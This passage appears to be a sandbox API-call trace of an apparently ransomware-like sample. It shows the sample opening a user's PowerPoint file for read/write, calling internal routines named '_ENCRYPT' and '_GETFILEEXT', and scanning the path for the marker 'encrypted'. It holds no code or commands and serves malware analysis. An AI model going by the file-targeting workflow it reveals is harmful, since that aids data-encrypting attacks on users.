RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c) returned 0x7ab260 [0036.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", cchWideChar=60, lpMultiByteStr=0x7ab260, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", lpUsedDefaultChar=0x0) returned 60 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.545] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mtos9hwepfvwpo.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=60, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0036.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x78) returned 0x7800d0 [0036.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=60, lpWideCharStr=0x7800d0, cchWideChar=60 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx") returned 60 [0036.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.546] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.547] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.547] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.547] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.547] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.547] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.548] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.548] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.548] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.548] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.548] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.548] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.549] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.549] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.549] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.549] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb755f130, ftCreationTime.dwHighDateTime=0x1d59f5f, ftLastAccessTime.dwLowDateTime=0x17f12a10, ftLastAccessTime.dwHighDateTime=0x1d53a60, ftLastWriteTime.dwLowDateTime=0x17f12a10, ftLastWriteTime.dwHighDateTime=0x1d53a60, nFileSizeHigh=0x0, nFileSizeLow=0x15d56, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MTos9HWEpFvwpo.pptx", cAlternateFileName="MTOS9H~1.PPT")) returned 0x7c20c0 [0036.549] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.549] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.549] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb755f130, ftCreationTime.dwHighDateTime=0x1d59f5f, ftLastAccessTime.dwLowDateTime=0x17f12a10, ftLastAccessTime.dwHighDateTime=0x1d53a60, ftLastWriteTime.dwLowDateTime=0x17f12a10, ftLastWriteTime.dwHighDateTime=0x1d53a60, nFileSizeHigh=0x0, nFileSizeLow=0x15d56, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MTos9HWEpFvwpo.pptx", cAlternateFileName="MTOS9H~1.PPT")) returned 0x7c20c0 [0036.549] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.549] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MTos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tos9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 